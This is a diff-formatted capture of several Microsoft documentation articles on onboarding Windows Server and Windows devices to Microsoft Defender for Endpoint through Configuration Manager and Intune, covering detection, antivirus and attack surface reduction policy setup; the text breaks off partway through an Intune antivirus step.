-Licensing requirements for Microsoft Defender for Endpoint can be found at: [Licensing requirements](minimum-requirements.md#licensing-requirements).
-
-#### Related Links
-
-[Add exclusions for Defender for Endpoint via PowerShell](/azure/architecture/example-scenario/wvd/windows-virtual-desktop-fslogix#add-exclusions-for-microsoft-defender-for-cloud-by-using-powershell)
-
-[FSLogix anti-malware exclusions](/fslogix/overview-prerequisites#configure-antivirus-file-and-folder-exclusions)
-
-[Configure Microsoft Defender Antivirus on a remote desktop or virtual desktop infrastructure environment](/microsoft-365/security/defender-endpoint/deployment-vdi-microsoft-defender-antivirus)
-
security Onboard Windows Server https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/onboard-windows-server.md
- Title: Defender for Endpoint onboarding Windows Server
-description: Onboard Windows Server to Microsoft Defender for Endpoint.
------- m365-security-- tier2-- Previously updated : 05/19/2022--
-# Defender for Endpoint onboarding Windows Server
--
-**Applies to:**
--- Windows Server 2008 R2-- Windows Server 2012 R2-- Windows Server 2016-- Windows Server Semi-Annual Enterprise Channel-- Windows Server 2019 and later-- Windows Server 2019 core edition-- Windows Server 2022-- [Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https:%2F%2Faka.ms%2FMDEp2OpenTrial)
-
-You'll need to go through the onboarding section of the Defender for Endpoint portal to onboard any of the supported devices. Depending on the device, you'll be guided with appropriate steps and provided management and deployment tool options suitable for the device.
-
-Defender for Endpoint extends support to also include the Windows Server operating system. This support provides advanced attack detection and investigation capabilities seamlessly through the Microsoft Defender XDR console. Support for Windows Server provides deeper insight into server activities, coverage for kernel and memory attack detection, and enables response actions.
-
-This topic describes how to onboard specific Windows servers to Microsoft Defender for Endpoint.
-
-For guidance on how to download and use Windows Security Baselines for Windows servers, see [Windows Security Baselines.](/windows/security/threat-protection/windows-security-configuration-framework/windows-security-baselines)
-
-## Windows Server onboarding overview
-
-You'll need to complete the following general steps to successfully onboard servers 2008 R2, 2012 R2, 2016, 2019, 2022.
--
-### Windows Server 2012 R2 and Windows Server 2016
-- Download installation and onboarding packages.-- Apply the installation package.-- Follow the onboarding steps for the corresponding tool.-
-### Windows Server Semi-Annual Enterprise Channel and Windows Server 2019
-- Download the onboarding package.-- Follow the onboarding steps for the corresponding tool.-
-## Offboard Windows servers
-
-You can offboard Windows Server 2012 R2, Windows Server 2016, Windows Server (SAC), Windows Server 2019, and Windows Server 2019 Core edition with the same method available for Windows 10 client devices.
--- [Offboard devices using Configuration Manager](/microsoft-365/security/defender-endpoint/configure-endpoints-sccm#offboard-devices-using-configuration-manager)-- [Offboard and monitor devices using Mobile Device Management tools](/microsoft-365/security/defender-endpoint/configure-endpoints-mdm#offboard-and-monitor-devices-using-mobile-device-management-tools)-- [Offboard devices using Group Policy](/microsoft-365/security/defender-endpoint/configure-endpoints-gp#offboard-devices-using-group-policy)-- [Offboard devices using a local script](/microsoft-365/security/defender-endpoint/configure-endpoints-script#offboard-devices-using-a-local-script)-
-After offboarding, you can proceed to uninstall the unified solution package on Windows Server 2012 R2 and Windows Server 2016.
-
-For other Windows server versions, you have two options to offboard Windows servers from the service:
-- Uninstall the MMA agent-- Remove the Defender for Endpoint workspace configuration-
-> [!NOTE]
-> These offboarding instructions for other Windows server versions also apply if you are running the previous Microsoft Defender for Endpoint for Windows Server 2016 and Windows Server 2012 R2 that requires the MMA. Instructions to migrate to the new unified solution are at [Server migration scenarios in Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/server-migration).
-
-## Related topics
--- [Onboard Windows devices using Microsoft Endpoint Configuration Manager](configure-endpoints-sccm.md)-- [Onboard Windows devices using Group Policy](configure-endpoints-gp.md)-- [Onboard non-persistent virtual desktop infrastructure (VDI) devices](configure-endpoints-vdi.md)
security Onboarding Endpoint Configuration Manager https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/onboarding-endpoint-configuration-manager.md
- Title: Onboarding using Microsoft Configuration Manager
-description: Learn how to onboard to Microsoft Defender for Endpoint using Microsoft Configuration Manager
-----
- - m365-security
- - m365solution-endpointprotect
- - m365solution-scenario
- - highpri
- - tier1
--- Previously updated : 12/18/2020--
-# Onboarding using Microsoft Configuration Manager
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-This article acts as an example onboarding method.
-
-In the [Planning](deployment-strategy.md) article, there were several methods provided to onboard devices to the service. This article covers the co-management architecture.
-
-*Diagram of environment architectures*
-
-While Defender for Endpoint supports onboarding of various endpoints and tools, this article doesn't cover them. For information on general onboarding using other supported deployment tools and methods, see [Onboarding overview](onboarding.md).
-
-This article guides users in:
--- Step 1: Onboarding Windows devices to the service-- Step 2: Configuring Defender for Endpoint capabilities-
-This onboarding guidance walks you through the following basic steps that you need to take when using Microsoft Configuration
--- **Creating a collection in Microsoft Configuration Manager**-- **Configuring Microsoft Defender for Endpoint capabilities using Microsoft Configuration Manager**-
-> [!NOTE]
-> Only Windows devices are covered in this example deployment.
-
-## Step 1: Onboard Windows devices using Microsoft Configuration Manager
-
-### Collection creation
-
-To onboard Windows devices with Microsoft Configuration Manager, the deployment can target an existing collection or a new collection can be created for testing.
-
-Onboarding using tools such as Group policy or manual method doesn't install any agent on the system.
-
-Within the Microsoft Configuration Manager, console the onboarding process will be configured as part of the compliance settings within the console.
-
-Any system that receives this required configuration maintains that configuration for as long as the Configuration Manager client continues to receive this policy from the management point.
-
-Follow the steps below to onboard endpoints using Microsoft Configuration Manager.
-
-1. In Microsoft Configuration Manager console, navigate to **Assets and Compliance \> Overview \> Device Collections**.
-
- :::image type="content" source="media/configmgr-device-collections.png" alt-text="The Microsoft Configuration Manager wizard1" lightbox="media/configmgr-device-collections.png":::
-
-2. Right select **Device Collection** and select **Create Device Collection**.
-
- :::image type="content" source="media/configmgr-create-device-collection.png" alt-text="The Microsoft Configuration Manager wizard2" lightbox="media/configmgr-create-device-collection.png":::
-
-3. Provide a **Name** and **Limiting Collection**, then select **Next**.
-
- :::image type="content" source="media/configmgr-limiting-collection.png" alt-text="The Microsoft Configuration Manager wizard3" lightbox="media/configmgr-limiting-collection.png":::
-
-4. Select **Add Rule** and choose **Query Rule**.
-
- :::image type="content" source="media/configmgr-query-rule.png" alt-text="The Microsoft Configuration Manager wizard4" lightbox="media/configmgr-query-rule.png":::
-
-5. Select **Next** on the **Direct Membership Wizard** and select on **Edit Query Statement**.
-
- :::image type="content" source="media/configmgr-direct-membership.png" alt-text="The Microsoft Configuration Manager wizard5" lightbox="media/configmgr-direct-membership.png":::
-
-6. Select **Criteria** and then choose the star icon.
-
- :::image type="content" source="media/configmgr-criteria.png" alt-text="The Microsoft Configuration Manager wizard6" lightbox="media/configmgr-criteria.png":::
-
-7. Keep criterion type as **simple value**, choose whereas **Operating System - build number**, operator as **is greater than or equal to** and value **14393** and select on **OK**.
-
- :::image type="content" source="media/configmgr-simple-value.png" alt-text="The Microsoft Configuration Manager wizard7" lightbox="media/configmgr-simple-value.png":::
-
-8. Select **Next** and **Close**.
-
- :::image type="content" source="media/configmgr-membership-rules.png" alt-text="The Microsoft Configuration Manager wizard8" lightbox="media/configmgr-membership-rules.png":::
-
-9. Select **Next**.
-
- :::image type="content" source="media/configmgr-confirm.png" alt-text="The Microsoft Configuration Manager wizard9" lightbox="media/configmgr-confirm.png":::
-
-After completing this task, you now have a device collection with all the Windows endpoints in the environment.
-
-## Step 2: Configure Microsoft Defender for Endpoint capabilities
-
-This section guides you in configuring the following capabilities using Microsoft Configuration Manager on Windows devices:
--- [**Endpoint detection and response**](#endpoint-detection-and-response)-- [**Next-generation protection**](#next-generation-protection)-- [**Attack surface reduction**](#attack-surface-reduction)-
-### Endpoint detection and response
-
-#### Windows 10 and Windows 11
-
-From within the Microsoft Defender portal it's possible to download the `.onboarding` policy that can be used to create the policy in System Center Configuration Manager and deploy that policy to Windows 10 and Windows 11 devices.
-
-1. From a <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>, select [Settings and then Onboarding](https://security.microsoft.com/preferences2/onboarding).
-
-2. Under Deployment method, select the supported version of **Microsoft Configuration Manager**.
-
- :::image type="content" source="mediatp-onboarding-wizard.png":::
-
-3. Select **Download package**.
-
- :::image type="content" source="mediatp-download-package.png":::
-
-4. Save the package to an accessible location.
-5. In Microsoft Configuration Manager, navigate to: **Assets and Compliance > Overview > Endpoint Protection > Microsoft Defender ATP Policies**.
-
-6. Right-click **Microsoft Defender ATP Policies** and select **Create Microsoft Defender ATP Policy**.
-
- :::image type="content" source="media/configmgr-create-policy.png" alt-text="The Microsoft Configuration Manager wizard12" lightbox="media/configmgr-create-policy.png":::
-
-7. Enter the name and description, verify **Onboarding** is selected, then select **Next**.
-
- :::image type="content" source="media/configmgr-policy-name.png" alt-text="The Microsoft Configuration Manager wizard13" lightbox="media/configmgr-policy-name.png":::
-
-8. Select **Browse**.
-
-9. Navigate to the location of the downloaded file from step 4 above.
-
-10. Select **Next**.
-11. Configure the Agent with the appropriate samples (**None** or **All file types**).
-
- :::image type="content" source="media/configmgr-config-settings.png" alt-text="The configuration settings1" lightbox="media/configmgr-config-settings.png":::
-
-12. Select the appropriate telemetry (**Normal** or **Expedited**) then select **Next**.
-
- :::image type="content" source="media/configmgr-telemetry.png" alt-text="The configuration settings2" lightbox="media/configmgr-telemetry.png":::
-
-13. Verify the configuration, then select **Next**.
-
- :::image type="content" source="media/configmgr-verify-configuration.png" alt-text="The configuration settings3" lightbox="media/configmgr-verify-configuration.png":::
-
-14. Select **Close** when the Wizard completes.
-
-15. In the Microsoft Configuration Manager console, right-click the Defender for Endpoint policy you created and select **Deploy**.
-
- :::image type="content" source="media/configmgr-deploy.png" alt-text="The configuration settings4" lightbox="media/configmgr-deploy.png":::
-
-16. On the right panel, select the previously created collection and select **OK**.
-
- :::image type="content" source="media/configmgr-select-collection.png" alt-text="The configuration settings5" lightbox="media/configmgr-select-collection.png":::
-
-#### Previous versions of Windows Client (Windows 7 and Windows 8.1)
-
-Follow the steps below to identify the Defender for Endpoint Workspace ID and Workspace Key that will be required for the onboarding of previous versions of Windows.
-
-1. From a <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>, select **Settings** \> **Endpoints** \> **Onboarding** (under **Device Management**).
-
-2. Under operating system, choose **Windows 7 SP1 and 8.1**.
-
-3. Copy the **Workspace ID** and **Workspace Key** and save them. They'll be used later in the process.
-
- :::image type="content" source="media/91b738e4b97c4272fd6d438d8c2d5269.png" alt-text="The onboarding process" lightbox="media/91b738e4b97c4272fd6d438d8c2d5269.png":::
-
-4. Install the Microsoft Monitoring Agent (MMA).
-
- MMA is currently (as of January 2019) supported on the following Windows Operating Systems:
-
- - Server SKUs: Windows Server 2008 SP1 or Newer
- - Client SKUs: Windows 7 SP1 and later
-
- The MMA agent needs to be installed on Windows devices. To install the agent, some systems need to download the [Update for customer experience and diagnostic telemetry](https://support.microsoft.com/help/3080149/update-for-customer-experience-and-diagnostic-telemetry) in order to collect the data with MMA. These system versions include but may not be limited to:
-
- - Windows 8.1
- - Windows 7
- - Windows Server 2016
- - Windows Server 2012 R2
- - Windows Server 2008 R2
-
- Specifically, for Windows 7 SP1, the following patches must be installed:
-
- - Install [KB4074598](https://support.microsoft.com/help/4074598/windows-7-update-kb4074598)
- - Install either [.NET Framework 4.5](https://www.microsoft.com/download/details.aspx?id=30653) (or later) **or** [KB3154518](https://support.microsoft.com/help/3154518/support-for-tls-system-default-versions-included-in-the-net-framework). Do not install both on the same system.
-
-5. If you're using a proxy to connect to the Internet see the Configure proxy settings section.
-
-Once completed, you should see onboarded endpoints in the portal within an hour.
-
-### Next generation protection
-
-Microsoft Defender Antivirus is a built-in anti-malware solution that provides next generation protection for desktops, portable computers, and servers.
-
-1. In the Microsoft Configuration Manager console, navigate to **Assets and Compliance \> Overview \> Endpoint Protection \> Antimalware Polices** and choose **Create Antimalware Policy**.
-
- :::image type="content" source="media/9736e0358e86bc778ce1bd4c516adb8b.png" alt-text="The antimalware policy" lightbox="media/9736e0358e86bc778ce1bd4c516adb8b.png":::
-
-2. Select **Scheduled scans**, **Scan settings**, **Default actions**, **Real-time protection**, **Exclusion settings**, **Advanced**, **Threat overrides**, **Cloud Protection Service** and **Security intelligence updates** and choose **OK**.
-
- :::image type="content" source="media/1566ad81bae3d714cc9e0d47575a8cbd.png" alt-text="The next-generation protection pane1" lightbox="media/1566ad81bae3d714cc9e0d47575a8cbd.png":::
-
- In certain industries or some select enterprise customers might have specific needs on how Antivirus is configured.
-
- [Quick scan versus full scan and custom scan](/windows/security/threat-protection/microsoft-defender-antivirus/scheduled-catch-up-scans-microsoft-defender-antivirus#quick-scan-versus-full-scan-and-custom-scan)
-
- For more information, see [Windows Security configuration framework](/windows/security/threat-protection/windows-security-configuration-framework/windows-security-configuration-framework).
-
- :::image type="content" source="media/cd7daeb392ad5a36f2d3a15d650f1e96.png" alt-text="The next-generation protection pane2" lightbox="media/cd7daeb392ad5a36f2d3a15d650f1e96.png":::
-
- :::image type="content" source="media/36c7c2ed737f2f4b54918a4f20791d4b.png" alt-text="The next-generation protection pane3" lightbox="media/36c7c2ed737f2f4b54918a4f20791d4b.png":::
-
- :::image type="content" source="media/a28afc02c1940d5220b233640364970c.png" alt-text="The next-generation protection pane4" lightbox="media/a28afc02c1940d5220b233640364970c.png":::
-
- :::image type="content" source="media/5420a8790c550f39f189830775a6d4c9.png" alt-text="The next-generation protection pane5" lightbox="media/5420a8790c550f39f189830775a6d4c9.png":::
-
- :::image type="content" source="media/33f08a38f2f4dd12a364f8eac95e8c6b.png" alt-text="The next-generation protection pane6" lightbox="media/33f08a38f2f4dd12a364f8eac95e8c6b.png":::
-
- :::image type="content" source="media/41b9a023bc96364062c2041a8f5c344e.png" alt-text="The next-generation protection pane7" lightbox="media/41b9a023bc96364062c2041a8f5c344e.png":::
-
- :::image type="content" source="media/945c9c5d66797037c3caeaa5c19f135c.png" alt-text="The next-generation protection pane8" lightbox="media/945c9c5d66797037c3caeaa5c19f135c.png":::
-
- :::image type="content" source="media/3876ca687391bfc0ce215d221c683970.png" alt-text="The next-generation protection pane9" lightbox="media/3876ca687391bfc0ce215d221c683970.png":::
-
-3. Right-click on the newly created anti-malware policy and select **Deploy**.
-
- :::image type="content" source="media/f5508317cd8c7870627cb4726acd5f3d.png" alt-text="The next-generation protection pane10" lightbox="media/f5508317cd8c7870627cb4726acd5f3d.png":::
-
-4. Target the new anti-malware policy to your Windows collection and select **OK**.
-
- :::image type="content" source="media/configmgr-select-collection.png" alt-text="The next-generation protection pane11" lightbox="media/configmgr-select-collection.png":::
-
-After completing this task, you now have successfully configured Microsoft Defender Antivirus.
-
-### Attack surface reduction
-
-The attack surface reduction pillar of Defender for Endpoint includes the feature set that is available under Exploit Guard. Attack surface reduction rules, Controlled Folder Access, Network Protection, and Exploit Protection.
-
-All these features provide a test mode and a block mode. In test mode, there's no end-user impact. All it does is collect other telemetry and make it available in the Microsoft Defender portal. The goal with a deployment is to step-by-step move security controls into block mode.
-
-To set attack surface reduction rules in test mode:
-
-1. In the Microsoft Configuration Manager console, navigate to **Assets and Compliance \> Overview \> Endpoint Protection \> Windows Defender Exploit Guard** and choose **Create Exploit Guard Policy**.
-
- :::image type="content" source="media/728c10ef26042bbdbcd270b6343f1a8a.png" alt-text="The Microsoft Configuration Manager console0" lightbox="media/728c10ef26042bbdbcd270b6343f1a8a.png":::
-
-2. Select **Attack Surface Reduction**.
-
-3. Set rules to **Audit** and select **Next**.
-
- :::image type="content" source="media/d18e40c9e60aecf1f9a93065cb7567bd.png" alt-text="The Microsoft Configuration Manager console1" lightbox="media/d18e40c9e60aecf1f9a93065cb7567bd.png":::
-
-4. Confirm the new Exploit Guard policy by selecting **Next**.
-
- :::image type="content" source="media/0a6536f2c4024c08709cac8fcf800060.png" alt-text="The Microsoft Configuration Manager console2" lightbox="media/0a6536f2c4024c08709cac8fcf800060.png":::
-
-5. Once the policy is created select **Close**.
-
- :::image type="content" source="media/95d23a07c2c8bc79176788f28cef7557.png" alt-text="The Microsoft Configuration Manager console3" lightbox="media/95d23a07c2c8bc79176788f28cef7557.png":::
-
-6. Right-click on the newly created policy and choose **Deploy**.
-
- :::image type="content" source="media/8999dd697e3b495c04eb911f8b68a1ef.png" alt-text="The Microsoft Configuration Manager console4" lightbox="media/8999dd697e3b495c04eb911f8b68a1ef.png":::
-
-7. Target the policy to the newly created Windows collection and select **OK**.
-
- :::image type="content" source="media/0ccfe3e803be4b56c668b220b51da7f7.png" alt-text="The Microsoft Configuration Manager console5" lightbox="media/0ccfe3e803be4b56c668b220b51da7f7.png":::
-
-After completing this task, you now have successfully configured attack surface reduction rules in test mode.
-
-Below are more steps to verify whether attack surface reduction rules are correctly applied to endpoints. (This may take few minutes)
-
-1. From a web browser, go to <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender XDR</a>.
-
-2. Select **Configuration management** from left side menu.
-
-3. Select **Go to attack surface management** in the Attack surface management panel.
-
- :::image type="content" source="media/security-center-attack-surface-mgnt-tile.png" alt-text="The attack surface management" lightbox="media/security-center-attack-surface-mgnt-tile.png":::
-
-4. Select **Configuration** tab in Attack surface reduction rules reports. It shows attack surface reduction rules configuration overview and attack surface reduction rules status on each device.
-
- :::image type="content" source="media/f91f406e6e0aae197a947d3b0e8b2d0d.png" alt-text="The attack surface reduction rules reports1" lightbox="media/f91f406e6e0aae197a947d3b0e8b2d0d.png":::
-
-5. Select each device shows configuration details of attack surface reduction rules.
-
- :::image type="content" source="media/24bfb16ed561cbb468bd8ce51130ca9d.png" alt-text="The attack surface reduction rules reports2" lightbox="media/24bfb16ed561cbb468bd8ce51130ca9d.png":::
-
-See [Optimize attack surface reduction rule deployment and detections](/microsoft-365/security/defender-endpoint/configure-machines-asr) for more details.
-
-#### Set Network Protection rules in test mode
-
-1. In the Microsoft Configuration Manager console, navigate to **Assets and Compliance \> Overview \> Endpoint Protection \> Windows Defender Exploit Guard** and choose **Create Exploit Guard Policy**.
-
- :::image type="content" source="media/728c10ef26042bbdbcd270b6343f1a8a.png" alt-text="The System Center Configuration Manager1" lightbox="media/728c10ef26042bbdbcd270b6343f1a8a.png":::
-
-2. Select **Network protection**.
-
-3. Set the setting to **Audit** and select **Next**.
-
- :::image type="content" source="media/c039b2e05dba1ade6fb4512456380c9f.png" alt-text="The System Center Configuration Manager2" lightbox="media/c039b2e05dba1ade6fb4512456380c9f.png":::
-
-4. Confirm the new Exploit Guard Policy by selecting **Next**.
-
- :::image type="content" source="media/0a6536f2c4024c08709cac8fcf800060.png" alt-text="The Exploit Guard policy1" lightbox="media/0a6536f2c4024c08709cac8fcf800060.png":::
-
-5. Once the policy is created select on **Close**.
-
- :::image type="content" source="media/95d23a07c2c8bc79176788f28cef7557.png" alt-text="The Exploit Guard policy2" lightbox="media/95d23a07c2c8bc79176788f28cef7557.png":::
-
-6. Right-click on the newly created policy and choose **Deploy**.
-
- :::image type="content" source="media/8999dd697e3b495c04eb911f8b68a1ef.png" alt-text="The Microsoft Configuration Manager-1" lightbox="media/8999dd697e3b495c04eb911f8b68a1ef.png":::
-
-7. Select the policy to the newly created Windows collection and choose **OK**.
-
- :::image type="content" source="media/0ccfe3e803be4b56c668b220b51da7f7.png" alt-text="The Microsoft Configuration Manager-2" lightbox="media/0ccfe3e803be4b56c668b220b51da7f7.png":::
-
-After completing this task, you now have successfully configured Network Protection in test mode.
-
-#### To set Controlled Folder Access rules in test mode
-
-1. In the Microsoft Configuration Manager console, navigate to **Assets and Compliance** > **Overview** > **Endpoint Protection** > **Windows Defender Exploit Guard** and then choose **Create Exploit Guard Policy**.
-
- :::image type="content" source="media/728c10ef26042bbdbcd270b6343f1a8a.png" alt-text="The Microsoft Configuration Manager-3" lightbox="media/728c10ef26042bbdbcd270b6343f1a8a.png":::
-
-2. Select **Controlled folder access**.
-
-3. Set the configuration to **Audit** and select **Next**.
-
- :::image type="content" source="media/a8b934dab2dbba289cf64fe30e0e8aa4.png" alt-text="The Microsoft Configuration Manager-4" lightbox="media/a8b934dab2dbba289cf64fe30e0e8aa4.png":::
-
-4. Confirm the new Exploit Guard Policy by selecting **Next**.
-
- :::image type="content" source="media/0a6536f2c4024c08709cac8fcf800060.png" alt-text="The Microsoft Configuration Manager-5" lightbox="media/0a6536f2c4024c08709cac8fcf800060.png":::
-
-5. Once the policy is created select on **Close**.
-
- :::image type="content" source="media/95d23a07c2c8bc79176788f28cef7557.png" alt-text="The Microsoft Configuration Manager-6" lightbox="media/95d23a07c2c8bc79176788f28cef7557.png":::
-
-6. Right-click on the newly created policy and choose **Deploy**.
-
- :::image type="content" source="media/8999dd697e3b495c04eb911f8b68a1ef.png" alt-text="The Microsoft Configuration Manager-7" lightbox="media/8999dd697e3b495c04eb911f8b68a1ef.png":::
-
-7. Target the policy to the newly created Windows collection and select **OK**.
--
-You have now successfully configured Controlled folder access in test mode.
-
-## Related article
--- [Onboarding using Microsoft Configuration Manager](onboarding-endpoint-manager.md)
security Onboarding Endpoint Manager https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/onboarding-endpoint-manager.md
- Title: Onboarding using Microsoft Intune
-description: Learn how to onboard to Microsoft Defender for Endpoint using Microsoft Intune.
-----
- - m365-security
- - m365solution-endpointprotect
- - m365solution-scenario
- - highpri
- - tier1
-- Previously updated : 12/18/2020--
-# Onboarding using Microsoft Intune
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-This article acts as an example onboarding method.
-
-In the [Planning](deployment-strategy.md) article, there were several methods provided to onboard devices to the service. This article covers the cloud-native architecture.
-
-*Diagram of environment architectures*
-
-While Defender for Endpoint supports onboarding of various endpoints and tools, this article doesn't cover them. For information on general onboarding using other supported deployment tools and methods, see [Onboarding overview](onboarding.md).
-
-The Microsoft Intune family of products is a solution platform that unifies several services. It includes [Microsoft Intune](/mem/intune/fundamentals/what-is-intune) and [Microsoft Configuration Manager](/mem/configmgr).
-
-This article guides users in:
--- Step 1: Onboarding devices to the service by creating a group in Microsoft Intune to assign configurations on-- Step 2: Configuring Defender for Endpoint capabilities using Microsoft Intune-
-This onboarding guidance walks you through the following basic steps that you need to take when using Microsoft Intune:
--- [Identifying target devices or users](#identify-target-devices-or-users)
- - Creating a Microsoft Entra group (User or Device)
-- [Creating a Configuration Profile](#step-2-create-configuration-policies-to-configure-microsoft-defender-for-endpoint-capabilities)
- - In Microsoft Intune, we guide you in creating a separate policy for each capability.
-
-## Resources
-
-Here are the links you need for the rest of the process:
--- [Intune admin center](https://aka.ms/memac)-- [Microsoft Defender XDR](https://security.microsoft.com)-- [Intune Security baselines](/mem/intune/protect/security-baseline-settings-defender-atp#microsoft-defender)-
-For more information about Microsoft Intune, go to [Microsoft Intune securely manages identities, manages apps, and manages devices](/mem/intune/fundamentals/what-is-intune).
-
-## Step 1: Onboard devices by creating a group in Intune to assign configurations on
-
-### Identify target devices or users
-
-In this section, we create a test group to assign your configurations on.
-
-> [!NOTE]
-> Intune uses Microsoft Entra groups to manage devices and users. As an Intune admin, you can set up groups to suit your organizational needs.
->
-> For more information, see [Add groups to organize users and devices](/mem/intune/fundamentals/groups-add).
-
-### Create a group
-
-1. Open the Microsoft Intune admin center.
-
-2. Open **Groups > New Group**.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/66f724598d9c3319cba27f79dd4617a4.png" alt-text="The Microsoft Intune admin center1" lightbox="media/66f724598d9c3319cba27f79dd4617a4.png":::
-
-3. Enter details and create a new group.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/b1e0206d675ad07db218b63cd9b9abc3.png" alt-text="The Microsoft Intune admin center2" lightbox="media/b1e0206d675ad07db218b63cd9b9abc3.png":::
-
-4. Add your test user or device.
-
-5. From the **Groups > All groups** pane, open your new group.
-
-6. Select **Members > Add members**.
-
-7. Find your test user or device and select it.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/149cbfdf221cdbde8159d0ab72644cd0.png" alt-text="The Microsoft Intune admin center3" lightbox="media/149cbfdf221cdbde8159d0ab72644cd0.png":::
-
-8. Your testing group now has a member to test.
-
-## Step 2: Create configuration policies to configure Microsoft Defender for Endpoint capabilities
-
-In the following section, you create several configuration policies.
-
-First is a configuration policy to select which groups of users or devices are onboarded to Defender for Endpoint:
--- [Endpoint detection and response](#endpoint-detection-and-response)-
-Then, you continue by creating several different types of endpoint security policies:
--- [Next-generation protection](#next-generation-protection)-- [Attack surface reduction](#attack-surface-reductionattack-surface-reduction-rules)-
-### Endpoint detection and response
-
-1. Open the Intune admin center.
-
-2. Navigate to **Endpoint security > Endpoint detection and response**. Select on **Create Policy**.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/58dcd48811147feb4ddc17212b7fe840.png" alt-text="The Microsoft Intune admin center4" lightbox="media/58dcd48811147feb4ddc17212b7fe840.png":::
-
-3. Under **Platform, select Windows 10, Windows 11, and Windows Server, Profile - Endpoint detection
- and response > Create**.
-
-4. Enter a name and description, then select **Next**.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/a5b2d23bdd50b160fef4afd25dda28d4.png" alt-text="The Microsoft Intune admin center5" lightbox="media/a5b2d23bdd50b160fef4afd25dda28d4.png":::
-
-5. Select settings as required, then select **Next**.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/cea7e288b5d42a9baf1aef0754ade910.png" alt-text="The Microsoft Intune admin center6" lightbox="media/cea7e288b5d42a9baf1aef0754ade910.png":::
-
- > [!NOTE]
- > In this instance, this has been auto populated as Defender for Endpoint has already been integrated with Intune. For more information on the integration, see [Enable Microsoft Defender for Endpoint in Intune](/mem/intune/protect/advanced-threat-protection-configure#to-enable-microsoft-defender-atp).
- >
- > The following image is an example of what you'll see when Microsoft Defender for Endpoint is NOT integrated with Intune:
- >
- > :::image type="content" source="media/2466460812371ffae2d19a10c347d6f4.png" alt-text="The Microsoft Intune admin center7" lightbox="media/2466460812371ffae2d19a10c347d6f4.png":::
-
-6. Add scope tags if necessary, then select **Next**.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/ef844f52ec2c0d737ce793f68b5e8408.png" alt-text="The Microsoft Intune admin center8" lightbox="media/ef844f52ec2c0d737ce793f68b5e8408.png":::
-
-7. Add test group by clicking on **Select groups to include** and choose your group, then select **Next**.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/fc3525e20752da026ec9f46ab4fec64f.png" alt-text="The Microsoft Intune admin center9" lightbox="media/fc3525e20752da026ec9f46ab4fec64f.png":::
-
-8. Review and accept, then select **Create**.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/289172dbd7bd34d55d24810d9d4d8158.png" alt-text="The Microsoft Intune admin center10" lightbox="media/289172dbd7bd34d55d24810d9d4d8158.png":::
-
-9. You can view your completed policy.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/5a568b6878be8243ea2b9d82d41ed297.png" alt-text="The Microsoft Intune admin center11" lightbox="media/5a568b6878be8243ea2b9d82d41ed297.png":::
-
-### Next-generation protection
-
-1. Open the Intune admin center.
-
-2. Navigate to **Endpoint security > Antivirus > Create Policy**.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/6b728d6e0d71108d768e368b416ff8ba.png" alt-text="The Microsoft Intune admin center12" lightbox="media/6b728d6e0d71108d768e368b416ff8ba.png":::
-
-3. Select **Platform - Windows 10 and Later - Windows and Profile - Microsoft Defender Antivirus > Create**.
-
-4. Enter name and description, then select **Next**.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/a7d738dd4509d65407b7d12beaa3e917.png" alt-text="The Microsoft Intune admin center13" lightbox="media/a7d738dd4509d65407b7d12beaa3e917.png":::
-
-5. In the **Configuration settings page**: Set the configurations you require for Microsoft Defender Antivirus (Cloud Protection, Exclusions, Real-Time Protection, and Remediation).
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/3840b1576d6f79a1d72eb14760ef5e8c.png" alt-text="The Microsoft Intune admin center14" lightbox="media/3840b1576d6f79a1d72eb14760ef5e8c.png":::
-
-6. Add scope tags if necessary, then select **Next**.
-
- > [!div class="mx-imgBorder"]
